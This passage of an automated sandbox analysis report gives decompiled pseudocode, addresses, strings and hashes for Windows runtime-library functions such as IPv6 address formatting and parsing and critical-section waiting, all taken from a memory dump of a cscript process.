				signed int _t34;
				signed int _t40;
				intOrPtr _t45;
				void* _t51;
				intOrPtr* _t52;
				void* _t54;
				signed int _t57;
				void* _t58;

				_t51 = __edx;
				_t24 =  *0x26e2088; // 0x7616febc
				_v8 = _t24 ^ _t57;
				_t45 = _a16;
				_t53 = _a4;
				_t52 = _a20;
				if(_a4 == 0 || _t52 == 0) {
					L10:
					_t26 = 0xc000000d;
				} else {
					if(_t45 == 0) {
						if( *_t52 == _t45) {
							goto L3;
						} else {
							goto L10;
						}
					} else {
						L3:
						_t28 =  &_v140;
						if(_a12 != 0) {
							_push("[");
							_push(0x41);
							_push( &_v140);
							_t29 = E02637707();
							_t58 = _t58 + 0xc;
							_t28 = _t57 + _t29 * 2 - 0x88;
						}
						_t54 = E026413CB(_t53, _t28);
						if(_a8 != 0) {
							_t34 = E02637707(_t54,  &_v10 - _t54 >> 1, L"%%%u", _a8);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t34 * 2;
						}
						if(_a12 != 0) {
							_t40 = E02637707(_t54,  &_v10 - _t54 >> 1, L"]:%u", _a12 & 0x0000ffff);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t40 * 2;
						}
						_t53 = (_t54 -  &_v140 >> 1) + 1;
						 *_t52 = _t53;
						if( *_t52 < _t53) {
							goto L10;
						} else {
							E02602340(_t45,  &_v140, _t53 + _t53);
							_t26 = 0;
						}
					}
				}
				return E0260E1B4(_t26, _t45, _v8 ^ _t57, _t51, _t52, _t53);
			}




















                                        0x026414c0
                                        0x026414cb
                                        0x026414d2
                                        0x026414d6
                                        0x026414da
                                        0x026414de
                                        0x026414e3
                                        0x0264157a
                                        0x0264157a
                                        0x026414f1
                                        0x026414f3
                                        0x0266ea0f
                                        0x00000000
                                        0x0266ea15
                                        0x00000000
                                        0x0266ea15
                                        0x026414f9
                                        0x026414f9
                                        0x026414fe
                                        0x02641504
                                        0x0266ea1a
                                        0x0266ea1f
                                        0x0266ea21
                                        0x0266ea22
                                        0x0266ea27
                                        0x0266ea2a
                                        0x0266ea2a
                                        0x02641515
                                        0x02641517
                                        0x0264156d
                                        0x02641572
                                        0x02641575
                                        0x02641575
                                        0x0264151e
                                        0x0266ea50
                                        0x0266ea55
                                        0x0266ea58
                                        0x0266ea58
                                        0x0264152e
                                        0x02641531
                                        0x02641533
                                        0x00000000
                                        0x02641535
                                        0x02641541
                                        0x02641549
                                        0x02641549
                                        0x02641533
                                        0x026414f3
                                        0x02641559

                                        APIs
                                        • ___swprintf_l.LIBCMT ref: 0266EA22
                                          • Part of subcall function 026413CB: ___swprintf_l.LIBCMT ref: 0264146B
                                          • Part of subcall function 026413CB: ___swprintf_l.LIBCMT ref: 02641490
                                        • ___swprintf_l.LIBCMT ref: 0264156D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.669430082.00000000025F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025E0000, based on PE: true
                                        • Associated: 00000007.00000002.669421162.00000000025E0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000007.00000002.669517370.00000000026D0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000007.00000002.669524373.00000000026E0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000007.00000002.669530863.00000000026E4000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000007.00000002.669537783.00000000026E7000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000007.00000002.669544839.00000000026F0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000007.00000002.669584383.0000000002750000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_25e0000_cscript.jbxd
                                        Similarity
                                        • API ID: ___swprintf_l
                                        • String ID: %%%u$]:%u
                                        • API String ID: 48624451-3050659472
                                        • Opcode ID: e2c6f2d39717dffb1139749faa9f43843f5ecabfe7d077bcf4ace2422fb43ac1
                                        • Instruction ID: 1ef2ef0d26431d39afb12e2d7d1c553f6f54b656cc56baa8b56b16a0e4fa3786
                                        • Opcode Fuzzy Hash: e2c6f2d39717dffb1139749faa9f43843f5ecabfe7d077bcf4ace2422fb43ac1
                                        • Instruction Fuzzy Hash: 2D21D7B29006199BDB25DE54CC44AEF73BDAF11704F444496EC9AD3280DF71AA99CBD0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 026253A5 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 185COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 45%
                                        			E026253A5(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t32;
				signed int _t37;
				signed int _t40;
				signed int _t42;
				void* _t45;
				intOrPtr _t46;
				void* _t48;
				signed int _t49;
				void* _t51;
				signed int _t57;
				signed int _t64;
				signed int _t71;
				void* _t74;
				intOrPtr _t78;
				signed int* _t79;
				void* _t85;
				signed int _t86;
				signed int _t92;
				void* _t104;
				void* _t105;

				_t64 = _a4;
				_t32 =  *(_t64 + 0x28);
				_t71 = _t64 + 0x28;
				_push(_t92);
				if(_t32 < 0) {
					_t78 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t64 + 0x2c)) -  *((intOrPtr*)(_t78 + 0x24));
					if( *((intOrPtr*)(_t64 + 0x2c)) !=  *((intOrPtr*)(_t78 + 0x24))) {
						goto L3;
					} else {
						__eflags = _t32 | 0xffffffff;
						asm("lock xadd [ecx], eax");
						return 1;
					}
				} else {
					L3:
					_push(_t86);
					while(1) {
						L4:
						__eflags = _t32;
						if(_t32 == 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) + 1;
							_t79 = _t64 + 0x24;
							_t71 = 1;
							asm("lock xadd [eax], ecx");
							_t32 =  *(_t64 + 0x28);
							_a4 = _t32;
							__eflags = _t32;
							if(_t32 != 0) {
								L19:
								_t86 = 0;
								__eflags = 0;
								while(1) {
									_t81 =  *(_t64 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t92 =  !( ~( *(_t64 + 0x30) & 1)) & 0x026e01c0;
									_push(_t92);
									_push(0);
									_t37 = E025FF8CC( *((intOrPtr*)(_t64 + 0x20)));
									__eflags = _t37 - 0x102;
									if(_t37 != 0x102) {
										break;
									}
									_t71 =  *(_t92 + 4);
									_t85 =  *_t92;
									_t51 = E02644FC0(_t85, _t71, 0xff676980, 0xffffffff);
									_push(_t85);
									_push(_t51);
									E02653F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t86);
									E02653F92(0x65, 0, "RTL: Resource at %p\n", _t64);
									_t86 = _t86 + 1;
									_t105 = _t104 + 0x28;
									__eflags = _t86 - 2;
									if(__eflags > 0) {
										E0268217A(_t71, __eflags, _t64);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E02653F92();
									_t104 = _t105 + 0xc;
								}
								__eflags = _t37;
								if(__eflags < 0) {
									_push(_t37);
									E02643915(_t64, _t71, _t81, _t86, _t92, __eflags);
									asm("int3");
									_t40 =  *_t71;
									 *_t71 = 0;
									__eflags = _t40;
									if(_t40 == 0) {
										L1:
										_t42 = E02625384(_t92 + 0x24);
										if(_t42 != 0) {
											goto L31;
										} else {
											goto L2;
										}
									} else {
										_t83 =  *((intOrPtr*)(_t92 + 0x18));
										_push( &_a4);
										_push(_t40);
										_t49 = E025FF970( *((intOrPtr*)(_t92 + 0x18)));
										__eflags = _t49;
										if(__eflags >= 0) {
											goto L1;
										} else {
											_push(_t49);
											E02643915(_t64,  &_a4, _t83, _t86, _t92, __eflags);
											L31:
											_t82 =  *((intOrPtr*)(_t92 + 0x20));
											_push( &_a4);
											_push(1);
											_t42 = E025FF970( *((intOrPtr*)(_t92 + 0x20)));
											__eflags = _t42;
											if(__eflags >= 0) {
												L2:
												return _t42;
											} else {
												_push(_t42);
												E02643915(_t64,  &_a4, _t82, _t86, _t92, __eflags);
												_t73 =  *((intOrPtr*)(_t92 + 0x20));
												_push( &_a4);
												_push(1);
												_t42 = E025FF970( *((intOrPtr*)(_t92 + 0x20)));
												__eflags = _t42;
												if(__eflags >= 0) {
													goto L2;
												} else {
													_push(_t42);
													_t45 = E02643915(_t64, _t73, _t82, _t86, _t92, __eflags);
													asm("int3");
													while(1) {
														_t74 = _t45;
														__eflags = _t45 - 1;
														if(_t45 != 1) {
															break;
														}
														_t86 = _t86 | 0xffffffff;
														_t45 = _t74;
														asm("lock cmpxchg [ebx], edi");
														__eflags = _t45 - _t74;
														if(_t45 != _t74) {
															continue;
														} else {
															_t46 =  *[fs:0x18];
															 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t46 + 0x24));
															return _t46;
														}
														goto L38;
													}
													E02625329(_t74, _t92);
													_push(1);
													_t48 = E026253A5(_t92);
													return _t48;
												}
											}
										}
									}
								} else {
									_t32 =  *(_t64 + 0x28);
									continue;
								}
							} else {
								_t71 =  *_t79;
								__eflags = _t71;
								if(__eflags > 0) {
									while(1) {
										_t57 = _t71;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t57 - _t71;
										if(_t57 == _t71) {
											break;
										}
										_t71 = _t57;
										__eflags = _t57;
										if(_t57 > 0) {
											continue;
										}
										break;
									}
									_t32 = _a4;
									__eflags = _t71;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L19;
								}
							}
						}
						goto L38;
					}
					_t71 = _t71 | 0xffffffff;
					_t32 = 0;
					asm("lock cmpxchg [edx], ecx");
					__eflags = 0;
					if(0 != 0) {
						goto L4;
					} else {
						 *((intOrPtr*)(_t64 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
						return 1;
					}
				}
				L38:
			}


























                                        0x026253ab
                                        0x026253ae
                                        0x026253b1
                                        0x026253b4
                                        0x026253b7
                                        0x026405b6
                                        0x026405c0
                                        0x026405c3
                                        0x00000000
                                        0x026405c9
                                        0x026405c9
                                        0x026405cc
                                        0x026405d5
                                        0x026405d5
                                        0x026253bd
                                        0x026253bd
                                        0x026253bd
                                        0x026253be
                                        0x026253be
                                        0x026253be
                                        0x026253c0
                                        0x00000000
                                        0x00000000
                                        0x02662269
                                        0x0266226d
                                        0x02662349
                                        0x0266234d
                                        0x02662273
                                        0x02662276
                                        0x02662279
                                        0x0266227e
                                        0x02662283
                                        0x02662287
                                        0x0266228a
                                        0x0266228d
                                        0x0266228f
                                        0x026622bc
                                        0x026622bc
                                        0x026622bc
                                        0x026622be
                                        0x026622c4
                                        0x026622cc
                                        0x026622d0
                                        0x026622d6
                                        0x026622d7
                                        0x026622da
                                        0x026622df
                                        0x026622e4
                                        0x00000000
                                        0x00000000
                                        0x026622e6
                                        0x026622e9
                                        0x026622f4
                                        0x026622f9
                                        0x026622fa
                                        0x02662305
                                        0x02662314
                                        0x02662319
                                        0x0266231a
                                        0x0266231d
                                        0x02662320
                                        0x02662323
                                        0x02662323
                                        0x02662328
                                        0x0266232d
                                        0x0266232f
                                        0x02662331
                                        0x02662336
                                        0x02662336
                                        0x0266233b
                                        0x0266233d
                                        0x02662350
                                        0x02662351
                                        0x02662356
                                        0x02662359
                                        0x02662359
                                        0x0266235b
                                        0x0266235d
                                        0x02625367
                                        0x0262536b
                                        0x02625372
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x02662363
                                        0x02662363
                                        0x02662369
                                        0x0266236a
                                        0x0266236c
                                        0x02662371
                                        0x02662373
                                        0x00000000
                                        0x02662379
                                        0x02662379
                                        0x0266237a
                                        0x0266237f
                                        0x0266237f
                                        0x02662385
                                        0x02662386
                                        0x02662389
                                        0x0266238e
                                        0x02662390
                                        0x02625378
                                        0x0262537c
                                        0x02662396
                                        0x02662396
                                        0x02662397
                                        0x0266239c
                                        0x026623a2
                                        0x026623a3
                                        0x026623a6
                                        0x026623ab
                                        0x026623ad
                                        0x00000000
                                        0x026623b3
                                        0x026623b3
                                        0x026623b4
                                        0x026623b9
                                        0x026623ba
                                        0x026623ba
                                        0x026623bc
                                        0x026623bf
                                        0x00000000
                                        0x00000000
                                        0x02659153
                                        0x02659158
                                        0x0265915a
                                        0x0265915e
                                        0x02659160
                                        0x00000000
                                        0x02659166
                                        0x02659166
                                        0x02659171
                                        0x02659176
                                        0x02659176
                                        0x00000000
                                        0x02659160
                                        0x026623c6
                                        0x026623cb
                                        0x026623ce
                                        0x026623d7
                                        0x026623d7
                                        0x026623ad
                                        0x02662390
                                        0x02662373
                                        0x0266233f
                                        0x0266233f
                                        0x00000000
                                        0x0266233f
                                        0x02662291
                                        0x02662291
                                        0x02662293
                                        0x02662295
                                        0x0266229a
                                        0x026622a1
                                        0x026622a3
                                        0x026622a7
                                        0x026622a9
                                        0x00000000
                                        0x00000000
                                        0x026622ab
                                        0x026622ad
                                        0x026622af
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x026622af
                                        0x026622b1
                                        0x026622b4
                                        0x026622b4
                                        0x026622b6
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x026622b6
                                        0x0266228f
                                        0x00000000
                                        0x0266226d
                                        0x026253cb
                                        0x026253ce
                                        0x026253d0
                                        0x026253d4
                                        0x026253d6
                                        0x00000000
                                        0x026253d8
                                        0x026253e3
                                        0x026253ea
                                        0x026253ea
                                        0x026253d6
                                        0x00000000

                                        APIs
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 026622F4
                                        Strings
                                        • RTL: Re-Waiting, xrefs: 02662328
                                        • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 026622FC
                                        • RTL: Resource at %p, xrefs: 0266230B
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.669430082.00000000025F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025E0000, based on PE: true
                                        • Associated: 00000007.00000002.669421162.00000000025E0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000007.00000002.669517370.00000000026D0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000007.00000002.669524373.00000000026E0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000007.00000002.669530863.00000000026E4000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000007.00000002.669537783.00000000026E7000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000007.00000002.669544839.00000000026F0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000007.00000002.669584383.0000000002750000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_25e0000_cscript.jbxd
                                        Similarity
                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                        • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                        • API String ID: 885266447-871070163
                                        • Opcode ID: 8541c1a66783adf88ca734752f017e3d2860e7cc160a502e9cb7f2917d18d9b0
                                        • Instruction ID: 3ee611f4fbc8ca3fed803807db83f02e9a0d4a0f390fac3f1ee8b81185236fec
                                        • Opcode Fuzzy Hash: 8541c1a66783adf88ca734752f017e3d2860e7cc160a502e9cb7f2917d18d9b0
                                        • Instruction Fuzzy Hash: B25106726007166BEB259F29CC84FA673ADAF44724F104629FD45DB380FB61E8458FA4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0262EC56 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 145COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 51%
                                        			E0262EC56(void* __ecx, void* __edx, intOrPtr* __edi, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v24;
				intOrPtr* _v28;
				intOrPtr _v32;
				signed int _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __esi;
				intOrPtr _t38;
				intOrPtr _t39;
				signed int _t40;
				intOrPtr _t42;
				intOrPtr _t43;
				signed int _t44;
				void* _t46;
				intOrPtr _t48;
				signed int _t49;
				intOrPtr _t50;
				intOrPtr _t53;
				signed char _t67;
				void* _t72;
				intOrPtr _t77;
				intOrPtr* _t80;
				intOrPtr _t84;
				intOrPtr* _t85;
				void* _t91;
				void* _t92;
				void* _t93;

				_t80 = __edi;
				_t75 = __edx;
				_t70 = __ecx;
				_t84 = _a4;
				if( *((intOrPtr*)(_t84 + 0x10)) == 0) {
					E0261DA92(__ecx, __edx, __eflags, _t84);
					_t38 =  *((intOrPtr*)(_t84 + 0x10));
				}
				_push(0);
				__eflags = _t38 - 0xffffffff;
				if(_t38 == 0xffffffff) {
					_t39 =  *0x26e793c; // 0x0
					_push(0);
					_push(_t84);
					_t40 = E026016C0(_t39);
				} else {
					_t40 = E025FF9D4(_t38);
				}
				_pop(_t85);
				__eflags = _t40;
				if(__eflags < 0) {
					_push(_t40);
					E02643915(_t67, _t70, _t75, _t80, _t85, __eflags);
					asm("int3");
					while(1) {
						L21:
						_t76 =  *[fs:0x18];
						_t42 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
						__eflags =  *(_t42 + 0x240) & 0x00000002;
						if(( *(_t42 + 0x240) & 0x00000002) != 0) {
							_v36 =  *(_t85 + 0x14) & 0x00ffffff;
							_v66 = 0x1722;
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_t76 =  &_v72;
							_push( &_v72);
							_v28 = _t85;
							_v40 =  *((intOrPtr*)(_t85 + 4));
							_v32 =  *((intOrPtr*)(_t85 + 0xc));
							_push(0x10);
							_push(0x20402);
							E026001A4( *0x7ffe0382 & 0x000000ff);
						}
						while(1) {
							_t43 = _v8;
							_push(_t80);
							_push(0);
							__eflags = _t43 - 0xffffffff;
							if(_t43 == 0xffffffff) {
								_t71 =  *0x26e793c; // 0x0
								_push(_t85);
								_t44 = E02601F28(_t71);
							} else {
								_t44 = E025FF8CC(_t43);
							}
							__eflags = _t44 - 0x102;
							if(_t44 != 0x102) {
								__eflags = _t44;
								if(__eflags < 0) {
									_push(_t44);
									E02643915(_t67, _t71, _t76, _t80, _t85, __eflags);
									asm("int3");
									E02682306(_t85);
									__eflags = _t67 & 0x00000002;
									if((_t67 & 0x00000002) != 0) {
										_t7 = _t67 + 2; // 0x4
										_t72 = _t7;
										asm("lock cmpxchg [edi], ecx");
										__eflags = _t67 - _t67;
										if(_t67 == _t67) {
											E0262EC56(_t72, _t76, _t80, _t85);
										}
									}
									return 0;
								} else {
									__eflags = _v24;
									if(_v24 != 0) {
										 *((intOrPtr*)(_v12 + 0xf84)) = 0;
									}
									return 2;
								}
								goto L36;
							}
							_t77 =  *((intOrPtr*)(_t80 + 4));
							_push(_t67);
							_t46 = E02644FC0( *_t80, _t77, 0xff676980, 0xffffffff);
							_push(_t77);
							E02653F92(0x65, 1, "RTL: Enter Critical Section Timeout (%I64u secs) %d\n", _t46);
							_t48 =  *_t85;
							_t92 = _t91 + 0x18;
							__eflags = _t48 - 0xffffffff;
							if(_t48 == 0xffffffff) {
								_t49 = 0;
								__eflags = 0;
							} else {
								_t49 =  *((intOrPtr*)(_t48 + 0x14));
							}
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_push(_t49);
							_t50 = _v12;
							_t76 =  *((intOrPtr*)(_t50 + 0x24));
							_push(_t85);
							_push( *((intOrPtr*)(_t85 + 0xc)));
							_push( *((intOrPtr*)(_t50 + 0x24)));
							E02653F92(0x65, 0, "RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu\n",  *((intOrPtr*)(_t50 + 0x20)));
							_t53 =  *_t85;
							_t93 = _t92 + 0x20;
							_t67 = _t67 + 1;
							__eflags = _t53 - 0xffffffff;
							if(_t53 != 0xffffffff) {
								_t71 =  *((intOrPtr*)(_t53 + 0x14));
								_a4 =  *((intOrPtr*)(_t53 + 0x14));
							}
							__eflags = _t67 - 2;
							if(_t67 > 2) {
								__eflags = _t85 - 0x26e20c0;
								if(_t85 != 0x26e20c0) {
									_t76 = _a4;
									__eflags = _a4 - _a8;
									if(__eflags == 0) {
										E0268217A(_t71, __eflags, _t85);
									}
								}
							}
							_push("RTL: Re-Waiting\n");
							_push(0);
							_push(0x65);
							_a8 = _a4;
							E02653F92();
							_t91 = _t93 + 0xc;
							__eflags =  *0x7ffe0382;
							if( *0x7ffe0382 != 0) {
								goto L21;
							}
						}
						goto L36;
					}
				} else {
					return _t40;
				}
				L36:
			}

































                                        0x0262ec56
                                        0x0262ec56
                                        0x0262ec56
                                        0x0262ec5c
                                        0x0262ec64
                                        0x026623e6
                                        0x026623eb
                                        0x026623eb
                                        0x0262ec6a
                                        0x0262ec6c
                                        0x0262ec6f
                                        0x026623f3
                                        0x026623f8
                                        0x026623fa
                                        0x026623fc
                                        0x0262ec75
                                        0x0262ec76
                                        0x0262ec76
                                        0x0262ec7b
                                        0x0262ec7c
                                        0x0262ec7e
                                        0x02662406
                                        0x02662407
                                        0x0266240c
                                        0x0266240d
                                        0x0266240d
                                        0x0266240d
                                        0x02662414
                                        0x02662417
                                        0x0266241e
                                        0x02662435
                                        0x02662438
                                        0x0266243c
                                        0x0266243f
                                        0x02662442
                                        0x02662443
                                        0x02662446
                                        0x02662449
                                        0x02662453
                                        0x02662455
                                        0x0266245b
                                        0x0266245b
                                        0x0262eb99
                                        0x0262eb99
                                        0x0262eb9c
                                        0x0262eb9d
                                        0x0262eb9f
                                        0x0262eba2
                                        0x02662465
                                        0x0266246b
                                        0x0266246d
                                        0x0262eba8
                                        0x0262eba9
                                        0x0262eba9
                                        0x0262ebae
                                        0x0262ebb3
                                        0x0262ebb9
                                        0x0262ebbb
                                        0x02662513
                                        0x02662514
                                        0x02662519
                                        0x0266251b
                                        0x0262ec2a
                                        0x0262ec2d
                                        0x0262ec33
                                        0x0262ec36
                                        0x0262ec3a
                                        0x0262ec3e
                                        0x0262ec40
                                        0x0262ec47
                                        0x0262ec47
                                        0x0262ec40
                                        0x026022c6
                                        0x0262ebc1
                                        0x0262ebc1
                                        0x0262ebc5
                                        0x0262ec9a
                                        0x0262ec9a
                                        0x0262ebd6
                                        0x0262ebd6
                                        0x00000000
                                        0x0262ebbb
                                        0x02662477
                                        0x0266247c
                                        0x02662486
                                        0x0266248b
                                        0x02662496
                                        0x0266249b
                                        0x0266249d
                                        0x026624a0
                                        0x026624a3
                                        0x026624aa
                                        0x026624aa
                                        0x026624a5
                                        0x026624a5
                                        0x026624a5
                                        0x026624ac
                                        0x026624af
                                        0x026624b0
                                        0x026624b3
                                        0x026624b9
                                        0x026624ba
                                        0x026624bb
                                        0x026624c6
                                        0x026624cb
                                        0x026624cd
                                        0x026624d0
                                        0x026624d1
                                        0x026624d4
                                        0x026624d6
                                        0x026624d9
                                        0x026624d9
                                        0x026624dc
                                        0x026624df
                                        0x026624e1
                                        0x026624e7
                                        0x026624e9
                                        0x026624ec
                                        0x026624ef
                                        0x026624f2
                                        0x026624f2
                                        0x026624ef
                                        0x026624e7
                                        0x026624fa
                                        0x026624ff
                                        0x02662501
                                        0x02662503
                                        0x02662506
                                        0x0266250b
                                        0x0262eb8c
                                        0x0262eb93
                                        0x00000000
                                        0x00000000
                                        0x0262eb93
                                        0x00000000
                                        0x0262eb99
                                        0x0262ec85
                                        0x0262ec85
                                        0x0262ec85
                                        0x00000000

                                        Strings
                                        • RTL: Re-Waiting, xrefs: 026624FA
                                        • RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 0266248D
                                        • RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 026624BD
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.669430082.00000000025F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025E0000, based on PE: true
                                        • Associated: 00000007.00000002.669421162.00000000025E0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000007.00000002.669517370.00000000026D0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000007.00000002.669524373.00000000026E0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000007.00000002.669530863.00000000026E4000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000007.00000002.669537783.00000000026E7000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000007.00000002.669544839.00000000026F0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000007.00000002.669584383.0000000002750000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_25e0000_cscript.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
                                        • API String ID: 0-3177188983
                                        • Opcode ID: aa9b14fac1087edc43e7d4d9a35fad14a6839d2ed7ced8719a9b6a62c78d6e60
                                        • Instruction ID: 21236211774887fd9f7997e60fa5e6bd1dd4b99b69a26ebf0a5c882eb72aa80f
                                        • Opcode Fuzzy Hash: aa9b14fac1087edc43e7d4d9a35fad14a6839d2ed7ced8719a9b6a62c78d6e60
                                        • Instruction Fuzzy Hash: 7A41F370600604ABDB24DFA8CC98F6B77A9AF84720F208619F9559B7C0D731E941CB64
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0263FCC9 Relevance: 6.3, APIs: 4, Instructions: 257COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E0263FCC9(signed short* _a4, char _a7, signed short** _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t105;
				void* _t110;
				char _t114;
				short _t115;
				void* _t118;
				signed short* _t119;
				short _t120;
				char _t122;
				void* _t127;
				void* _t130;
				signed int _t136;
				intOrPtr _t143;
				signed int _t158;
				signed short* _t164;
				signed int _t167;
				void* _t170;

				_t158 = 0;
				_t164 = _a4;
				_v20 = 0;
				_v24 = 0;
				_v8 = 0;
				_v12 = 0;
				_v16 = 0;
				_v28 = 0;
				_t136 = 0;
				while(1) {
					_t167 =  *_t164 & 0x0000ffff;
					if(_t167 == _t158) {
						break;
					}
					_t118 = _v20 - _t158;
					if(_t118 == 0) {
						if(_t167 == 0x3a) {
							if(_v12 > _t158 || _v8 > _t158) {
								break;
							} else {
								_t119 =  &(_t164[1]);
								if( *_t119 != _t167) {
									break;
								}
								_t143 = 2;
								 *((short*)(_a12 + _t136 * 2)) = 0;
								_v28 = 1;
								_v8 = _t143;
								_t136 = _t136 + 1;
								L47:
								_t164 = _t119;
								_v20 = _t143;
								L14:
								if(_v24 == _t158) {
									L19:
									_t164 =  &(_t164[1]);
									_t158 = 0;
									continue;
								}
								if(_v12 == _t158) {
									if(_v16 > 4) {
										L29:
										return 0xc000000d;
									}
									_t120 = E0263EE02(_v24, _t158, 0x10);
									_t170 = _t170 + 0xc;
									 *((short*)(_a12 + _t136 * 2)) = _t120;
									_t136 = _t136 + 1;
									goto L19;
								}
								if(_v16 > 3) {
									goto L29;
								}
								_t122 = E0263EE02(_v24, _t158, 0xa);
								_t170 = _t170 + 0xc;
								if(_t122 > 0xff) {
									goto L29;
								}
								 *((char*)(_v12 + _t136 * 2 + _a12 - 1)) = _t122;
								goto L19;
							}
						}
						L21:
						if(_v8 > 7 || _t167 >= 0x80) {
							break;
						} else {
							if(E0263685D(_t167, 4) == 0) {
								if(E0263685D(_t167, 0x80) != 0) {
									if(_v12 > 0) {
										break;
									}
									_t127 = 1;
									_a7 = 1;
									_v24 = _t164;
									_v20 = 1;
									_v16 = 1;
									L36:
									if(_v20 == _t127) {
										goto L19;
									}
									_t158 = 0;
									goto L14;
								}
								break;
							}
							_a7 = 0;
							_v24 = _t164;
							_v20 = 1;
							_v16 = 1;
							goto L19;
						}
					}
					_t130 = _t118 - 1;
					if(_t130 != 0) {
						if(_t130 == 1) {
							goto L21;
						}
						_t127 = 1;
						goto L36;
					}
					if(_t167 >= 0x80) {
						L7:
						if(_t167 == 0x3a) {
							_t158 = 0;
							if(_v12 > 0 || _v8 > 6) {
								break;
							} else {
								_t119 =  &(_t164[1]);
								if( *_t119 != _t167) {
									_v8 = _v8 + 1;
									L13:
									_v20 = _t158;
									goto L14;
								}
								if(_v28 != 0) {
									break;
								}
								_v28 = _v8 + 1;
								_t143 = 2;
								_v8 = _v8 + _t143;
								goto L47;
							}
						}
						if(_t167 != 0x2e || _a7 != 0 || _v12 > 2 || _v8 > 6) {
							break;
						} else {
							_v12 = _v12 + 1;
							_t158 = 0;
							goto L13;
						}
					}
					if(E0263685D(_t167, 4) != 0) {
						_v16 = _v16 + 1;
						goto L19;
					}
					if(E0263685D(_t167, 0x80) != 0) {
						_v16 = _v16 + 1;
						if(_v12 > 0) {
							break;
						}
						_a7 = 1;
						goto L19;
					}
					goto L7;
				}
				 *_a8 = _t164;
				if(_v12 != 0) {
					if(_v12 != 3) {
						goto L29;
					}
					_v8 = _v8 + 1;
				}
				if(_v28 != 0 || _v8 == 7) {
					if(_v20 != 1) {
						if(_v20 != 2) {
							goto L29;
						}
						 *((short*)(_a12 + _t136 * 2)) = 0;
						L65:
						_t105 = _v28;
						if(_t105 != 0) {
							_t98 = (_t105 - _v8) * 2; // 0x11
